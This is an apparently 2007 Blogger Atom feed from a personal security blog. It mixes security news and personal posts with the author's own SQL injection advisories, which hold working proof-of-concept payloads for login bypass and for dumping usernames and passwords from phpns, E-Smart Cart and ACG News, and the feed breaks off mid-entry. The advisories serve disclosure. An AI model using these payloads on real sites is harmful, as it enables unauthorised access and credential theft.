<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-644393906036076309</id><updated>2012-02-08T15:20:55.552-08:00</updated><category term='dr doom'/><category term='csrf'/><category term='delegados médicos'/><category term='introduction'/><category term='videoclip'/><category term='funny'/><category term='he pingping'/><category term='swing'/><category term='movies'/><category term='phpns'/><category term='apple'/><category term='daft punk'/><category term='real madrid'/><category term='playstation'/><category term='thatvideosite'/><category term='file inclusion'/><category term='mobile phones'/><category term='privacy'/><category term='youtube'/><category term='goal'/><category term='sql injection'/><category term='bao xishu'/><category term='firefox'/><category term='wtc'/><category term='fantastic 4'/><category term='acgnews'/><category term='noteworks'/><category term='DIM'/><category term='opensource'/><category term='shell'/><category term='girls'/><category term='vnunet'/><category term='shrek'/><category term='rfi'/><category term='browser'/><category term='prey'/><category term='windows'/><category term='imdb'/><category term='evil'/><category term='code'/><category term='firewall'/><category term='football'/><category term='review'/><category term='portuguese'/><category term='harry potter'/><category term='quicktime'/><category term='acg news'/><category term='south park'/><category term='world trade center'/><category term='extensions'/><category term='milw0rm'/><category term='java'/><category term='mysql'/><category term='mysqli'/><category term='php'/><category term='silver surfer'/><category term='security'/><category term='conspiracy'/><category term='programming'/><category term='e-smart'/><category term='videos'/><category term='javax'/><category term='music'/><category term='school'/><category term='security airport'/><category term='ascii'/><category term='publicity'/><category term='psp shell'/><category term='microsoft'/><category term='kanye west'/><category term='mozilla'/><category term='arcadem'/><category term='you tube'/><category term='google'/><category term='family guy'/><title type='text'>14house dot blogspot dot com</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://14house.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-1060562292283290933</id><published>2007-11-27T08:26:00.000-08:00</published><updated>2007-11-27T08:33:37.381-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='quicktime'/><category scheme='http://www.blogger.com/atom/ns#' term='apple'/><title type='text'>Critical vulnerability in Quicktime 7.3</title><content type='html'>&lt;blockquote&gt;&lt;span style="font-style:italic;"&gt;USCert has issued a warning concerning a buffer overflow in the current version of Apple QuickTime. Attackers can manipulate content type headers in an RTSP data stream to cause a buffer overflow that allows malicious code to be injected into the system under attack. Users of Apple's iTunes multimedia software are also affected by the hole because the current version of QuickTime is installed on systems when iTunes is installed. &lt;br /&gt;&lt;br /&gt;Demo programs that reportedly demonstrate the vulnerability have already popped up in the milw0rm archive. Until Apple releases a patch for this vulnerability, the only workaround for the playback of RTSP streams is to use other software or to restrict the use of streaming data via the firewall. Users are also advised to be careful with QuickTime Link files (.qtl), which can also reference RTSP sources. Apple released version 7.3 only a few weeks ago.&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;This vulnerability is also coliding with Windows Vista and giving an attacker permissions to control a remote machine.&lt;br /&gt;&lt;br /&gt;Proof of concept: &lt;a href="http://milw0rm.com/exploits/4664"&gt;Here&lt;/a&gt;&lt;br /&gt;Advisory from CERT: &lt;a href="http://www.kb.cert.org/vuls/id/659761"&gt;Here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-1060562292283290933?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/1060562292283290933/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=1060562292283290933' title='140 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/1060562292283290933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/1060562292283290933'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/11/critical-vulnerability-in-quicktime-73.html' title='Critical vulnerability in Quicktime 7.3'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>140</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-2189867239818491033</id><published>2007-11-23T02:01:00.001-08:00</published><updated>2007-11-23T07:05:07.933-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mobile phones'/><category scheme='http://www.blogger.com/atom/ns#' term='csrf'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>CSRF on mobile phones</title><content type='html'>Today I read an good article about using CSRF (Cross-site Request Forgery) on mobile phones. It uses the lack verification of sms limits on some phone services like ring tones, favorites, etc. It was posted on Bugtraq, but you can read more about this on the original website.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-style:italic;"&gt;No. I'm not going to show you how to use Cross-Site Request Forgery (CSRF) in order to attack mobile phones while using a mobile phone to surf the web. Instead, I'm going to talk about how CSRF vulnerabilities can be used to cause denial-of-service attacks against mobile phones, by flooding the phone with SMS and service messages.&lt;br /&gt;&lt;br /&gt;Mobile phone service providers in Israel, and throughout the world, provide a web interface to send SMS messages. Fortunately, they limit the SMS sending web interface to 20 messages per day, and they also require the user to login to their web site in order to send an SMS.&lt;br /&gt;&lt;br /&gt;Unfortunately, at-least when referring to the Israeli providers, they also give attackers a way to send endless SMS and service messages without any kind of authentication and with a simple HTTP request. While this method doesn't allow to specify the message of the SMS, it does allow the attacker to specify the targeted phone number.&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://aviv.raffon.net/2007/11/22/UsingCSRFToAttackMobilePhones.aspx"&gt;Full article&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-2189867239818491033?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/2189867239818491033/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=2189867239818491033' title='108 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/2189867239818491033'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/2189867239818491033'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/11/csrf-on-mobile-phones.html' title='CSRF on mobile phones'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>108</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7522916081945872699</id><published>2007-11-21T13:42:00.000-08:00</published><updated>2007-11-22T13:09:52.767-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='firefox'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='mozilla'/><category scheme='http://www.blogger.com/atom/ns#' term='browser'/><title type='text'>Mozilla fights for security in beta 3</title><content type='html'>&lt;span style="font-style:italic;"&gt;The Mozilla Foundation released on Monday a beta version of the group's latest open-source Firefox browser, rewriting parts of the code and enhancing security.&lt;br /&gt;&lt;br /&gt;Firefox 3 Beta 1 &lt;a href="http://www.mozilla.com/en-US/firefox/3.0b1/releasenotes/"&gt;adds&lt;/a&gt; anti-malware features to the browser, using a similar mechanism as the anti-phishing feature in Firefox 2, harnessing a Google-generated blacklist of sites that are hosting malicious code. The beta version of the browser also checks plugins to make sure they are compatible with the software and uses a secure download mechanism for updates.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In &lt;a href="http://www.securityfocus.com/brief/631?ref=rss"&gt;SecurityFocus&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I actually use Opera browser, but I used mozilla for years, so if you want take a look at the mozilla beta 3 (&lt;a href="http://www.mozilla.com/en-US/firefox/all-beta.html"&gt;here&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Some browser statistics links:&lt;br /&gt;&lt;a href="http://www.w3schools.com/browsers/default.asp"&gt;http://www.w3schools.com/browsers/default.asp&lt;/a&gt;&lt;br /&gt;&lt;a href="http://operawatch.com/news/2006/08/some-opera-statistics-2.html"&gt;http://operawatch.com/news/2006/08/some-opera-statistics-2.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Usage_share_of_web_browsers"&gt;http://en.wikipedia.org/wiki/Usage_share_of_web_browsers&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7522916081945872699?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/7522916081945872699/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7522916081945872699' title='103 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7522916081945872699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7522916081945872699'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/11/mozilla-fights-for-security-in-beta-3.html' title='Mozilla fights for security in beta 3'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>103</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5528995100312412593</id><published>2007-11-06T03:39:00.000-08:00</published><updated>2007-11-06T03:56:49.203-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DIM'/><category scheme='http://www.blogger.com/atom/ns#' term='delegados médicos'/><category scheme='http://www.blogger.com/atom/ns#' term='school'/><category scheme='http://www.blogger.com/atom/ns#' term='programming'/><title type='text'>DIM application</title><content type='html'>I finished my school project about controling pharmaceutical sales representative in portuguese health centers or hospitals. It's coded in Visual Basic .NET and uses SQL server database support. Simple fast and secure, login credentials are controlled by stored procedures. You can see some screenshots here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img131.imageshack.us/img131/208/administrativossfq2.png"&gt;Screen 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img362.imageshack.us/img362/3233/medicossmh5.png"&gt;Screen 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img209.imageshack.us/img209/3398/loginscreenssej7.png"&gt;Screen 3&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img210.imageshack.us/img210/5597/tilessrb4.png"&gt;Screen 4&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5528995100312412593?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5528995100312412593/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5528995100312412593' title='103 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5528995100312412593'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5528995100312412593'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/11/dim-application.html' title='DIM application'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>103</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7178821354169341957</id><published>2007-09-02T04:03:00.000-07:00</published><updated>2007-09-02T04:04:54.131-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='e-smart'/><title type='text'>E-Smart Cart SQL Injection</title><content type='html'>Software: E-Smart Card&lt;br /&gt;Vendor link: http://www.hostnomi.com/cart.htm&lt;br /&gt;Attack: SQL Injection (admin bypass)&lt;br /&gt;&lt;br /&gt;Discovered by: David Sopas Ferreira a.k.a SmOk3 &lt; smok3f00 at gmail.com &gt;&lt;br /&gt;&lt;br /&gt;SQL Injection&lt;br /&gt;-------------&lt;br /&gt;An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable file is embadmin/login.asp, and a malicious user can bypass administration login.&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;embadmin/login.asp&lt;br /&gt;&lt;br /&gt;user: 'or''='&lt;br /&gt;pass: 'or''='&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;&lt;br /&gt;Your script should filter metacharacters from user input.&lt;br /&gt;&lt;br /&gt;Vendor:&lt;br /&gt;&lt;br /&gt;Contacted and waiting for reply.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7178821354169341957?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/7178821354169341957/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7178821354169341957' title='348 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7178821354169341957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7178821354169341957'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/09/e-smart-cart-sql-injection.html' title='E-Smart Cart SQL Injection'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>348</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7900197137228747934</id><published>2007-08-29T03:30:00.000-07:00</published><updated>2007-08-29T03:35:39.141-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='phpns'/><title type='text'>PHPNS SQL Injection</title><content type='html'>Software: phpns current version (v1.1)&lt;br /&gt;Vendor link: http://phpns.com&lt;br /&gt;Attack: SQL Injection&lt;br /&gt;&lt;br /&gt;Discovered by: David Sopas Ferreira a.k.a SmOk3 &lt; smok3f00 at gmail.com &gt;&lt;br /&gt;&lt;br /&gt;SQL Injection&lt;br /&gt;-------------&lt;br /&gt;An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variable is $nid and maybe others.&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;/phpns/shownews.php?id=1'[SQL Injection]&lt;br /&gt;&lt;br /&gt;Shows username : pass from userinfo&lt;br /&gt;/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),&lt;br /&gt;username,char(32,112,97,115,115,119,111,114,100,58),password),&lt;br /&gt;null,null,null from userinfo/*&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;&lt;br /&gt;Your script should filter metacharacters from user input.&lt;br /&gt;&lt;br /&gt;Vendor:&lt;br /&gt;&lt;br /&gt;Contacted and replyed that they are fixing it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7900197137228747934?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/7900197137228747934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7900197137228747934' title='373 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7900197137228747934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7900197137228747934'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/phpns-sql-injection.html' title='PHPNS SQL Injection'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>373</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-4294186225076229578</id><published>2007-08-28T16:53:00.000-07:00</published><updated>2007-08-28T17:00:57.595-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ascii'/><title type='text'>Old school ascii artwork</title><content type='html'>I know is kind of old, but this thing rules at all time. I first saw the star wars telnet ascii thing like 8/10 years ago and it still rox.&lt;br /&gt;&lt;br /&gt;# For star wars&lt;br /&gt;telnet towel.blinkenlights.nl &lt;br /&gt;&lt;br /&gt;# For DOS chat room and some extras&lt;br /&gt;telnet centralperk.us 2323&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-4294186225076229578?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/4294186225076229578/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=4294186225076229578' title='50 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4294186225076229578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4294186225076229578'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/old-school-ascii-artwork.html' title='Old school ascii artwork'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>50</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5630504486135425846</id><published>2007-08-28T06:43:00.000-07:00</published><updated>2007-08-29T08:09:24.550-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='acg news'/><category scheme='http://www.blogger.com/atom/ns#' term='acgnews'/><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><title type='text'>ACG News SQL Injection</title><content type='html'>Software: ACG News 1.0&lt;br /&gt;Vendor link: http://www.altercoder.com&lt;br /&gt;Vendor Demo link: http://acgnews.uw.hu/index.php&lt;br /&gt;Attack: SQL Injection&lt;br /&gt;&lt;br /&gt;Discovered by: David Sopas Ferreira a.k.a SmOk3 &lt; smok3f00 at gmail.com &gt;&lt;br /&gt;&lt;br /&gt;SQL Injection&lt;br /&gt;-------------&lt;br /&gt;An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file.&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;index.php?menu=showarticle&amp;aid=[SQL INJECTION]&lt;br /&gt;index.php?menu=showarticle&amp;aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7&lt;br /&gt;&lt;br /&gt;index.php?menu=showcat&amp;catid=[SQL INJECTION]&lt;br /&gt;index.php?menu=showcat&amp;catid=-3 UNION ALL SELECT 1,@@version&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;&lt;br /&gt;Your script should filter metacharacters from user input.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vendor (Liam Dawe) is already fixing all the problems that I found out, a few more were added by myself...&lt;br /&gt;&lt;br /&gt;Proof Of Concept&lt;br /&gt;&lt;br /&gt;SQL Injection:&lt;br /&gt;printable.php?aid=-3%20UNION%20ALL%20SELECT%201,@@version&lt;br /&gt;,3,4,5,user(),7&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5630504486135425846?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5630504486135425846/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5630504486135425846' title='161 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5630504486135425846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5630504486135425846'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/acg-news-sql-injection.html' title='ACG News SQL Injection'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>161</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7319431571713543043</id><published>2007-08-27T08:18:00.000-07:00</published><updated>2007-08-27T08:21:53.338-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='he pingping'/><category scheme='http://www.blogger.com/atom/ns#' term='bao xishu'/><title type='text'>Mini mi</title><content type='html'>He Pingping, 73cm, will use Bao Xishu, 2.36m, as weapon to take over the world :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_r_2hSZl8U08/RtLr-qYF2-I/AAAAAAAAAAc/mp1zIg-dRQ0/s1600-h/smkf00_01.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_r_2hSZl8U08/RtLr-qYF2-I/AAAAAAAAAAc/mp1zIg-dRQ0/s320/smkf00_01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5103400789523946466" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7319431571713543043?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/7319431571713543043/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7319431571713543043' title='22 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7319431571713543043'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7319431571713543043'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/mini-mi.html' title='Mini mi'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_r_2hSZl8U08/RtLr-qYF2-I/AAAAAAAAAAc/mp1zIg-dRQ0/s72-c/smkf00_01.jpg' height='72' width='72'/><thr:total>22</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-6656360437066783154</id><published>2007-08-26T06:07:00.001-07:00</published><updated>2007-08-26T06:08:54.083-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security airport'/><category scheme='http://www.blogger.com/atom/ns#' term='firewall'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Airport security</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_r_2hSZl8U08/RtF7NaYF29I/AAAAAAAAAAU/J6Ewsj2l7To/s1600-h/755509753_3c2077aa80.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_r_2hSZl8U08/RtF7NaYF29I/AAAAAAAAAAU/J6Ewsj2l7To/s320/755509753_3c2077aa80.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5102995323136367570" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Owned! :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-6656360437066783154?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/6656360437066783154/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=6656360437066783154' title='17 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6656360437066783154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6656360437066783154'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/airport-security.html' title='Airport security'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_r_2hSZl8U08/RtF7NaYF29I/AAAAAAAAAAU/J6Ewsj2l7To/s72-c/755509753_3c2077aa80.jpg' height='72' width='72'/><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-962899850027873959</id><published>2007-08-25T03:19:00.000-07:00</published><updated>2007-08-25T03:24:44.487-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='psp shell'/><category scheme='http://www.blogger.com/atom/ns#' term='shell'/><category scheme='http://www.blogger.com/atom/ns#' term='playstation'/><title type='text'>PSP Shell</title><content type='html'>Nothing is impossible right?&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_r_2hSZl8U08/RtADO6YF28I/AAAAAAAAAAM/_ZzYhIinZVE/s1600-h/ABCD0017.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_r_2hSZl8U08/RtADO6YF28I/AAAAAAAAAAM/_ZzYhIinZVE/s320/ABCD0017.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5102581932534127554" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Total ownage! Give my credits to DarkRevenge&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-962899850027873959?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/962899850027873959/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=962899850027873959' title='14 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/962899850027873959'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/962899850027873959'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/psp-shell.html' title='PSP Shell'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_r_2hSZl8U08/RtADO6YF28I/AAAAAAAAAAM/_ZzYhIinZVE/s72-c/ABCD0017.jpg' height='72' width='72'/><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-3079839240554778340</id><published>2007-08-24T06:00:00.000-07:00</published><updated>2007-08-26T04:38:20.564-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='file inclusion'/><category 